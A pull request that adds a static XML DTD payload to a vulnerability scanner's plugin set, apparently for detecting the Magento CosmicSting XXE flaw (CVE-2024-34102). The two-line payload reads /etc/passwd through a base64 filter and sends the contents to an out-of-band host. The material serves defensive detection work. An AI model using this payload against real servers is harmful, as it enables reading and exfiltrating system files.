### PR TITLE
Add DTD payload for Magento CosmicSting XXE

### DIFF
--- a/payloads/magento-cosmicsting-xxe/dtd.xml
+++ b/payloads/magento-cosmicsting-xxe/dtd.xml
@@ -1,0 +1,2 @@
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM '%oob;?data=%data;'>">


### PR DESCRIPTION
This PR adds the static payload to use with the Magneto CosmicSting XXE ([CVE-2024-34102](https://github.com/advisories/GHSA-m8cj-3v68-3cxj)) detector.

The detector PR is here: https://github.com/google/tsunami-security-scanner-plugins/pull/538